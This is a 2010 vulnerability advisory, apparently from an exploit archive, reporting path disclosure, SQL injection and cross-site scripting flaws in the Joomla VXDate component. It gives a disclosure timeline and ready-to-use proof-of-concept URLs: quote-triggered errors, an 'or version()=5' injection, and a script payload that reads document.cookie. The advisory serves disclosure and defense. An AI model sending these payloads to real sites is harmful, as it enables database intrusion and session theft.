Joomla Component com_vxdate Multiple Vulnerabilities

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Joomla Component com_vxdate Multiple Vulnerabilities
# Published : 2010-03-17
# Author : MustLive
# Previous Title : PHP-Nuke ratedownload SQL Injection
# Next Title : osCMax 2.0 (fckeditor) Remote File Upload

-------------------------------------------------------------------------------------------------------------

I want to warn you about vulnerabilities in component VXDate for Joomla.


-----------------------------

Advisory: Vulnerabilities in VXDate for Joomla

-----------------------------

URL: http://websecurity.com.ua/3849/

-----------------------------

Timeline:



10.05.2009 - found the vulnerabilities.

12.01.2010 - announced at my site.

18.01.2010 - informed developers.

13.03.2010 - disclosed at my site.

-----------------------------

Details:

These are Full path disclosure, SQL Injection and Cross-Site Scripting vulnerabilities.


Full path disclosure:

http://site/index.php?option=com_vxdate&ct=’

http://site/index.php?option=com_vxdate&ct=1&md=details&id=’

http://site/index.php?option=com_vxdate&ct=1&md=editform&id=’



SQL Injection:

http://site/index.php?option=com_vxdate&ct=1&md=details&id=-1%20or%20version()=5

http://site/index.php?option=com_vxdate&ct=1&md=editform&id=-1%20or%20version()=5


XSS:

http://site/index.php?option=com_vxdate&ct=1&md=details&id=%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://site/index.php?option=com_vxdate&ct=1&md=editform&id=%3Cscript%3Ealert(document.cookie)%3C/script%3E

Vulnerable are potentially all versions of VXDate.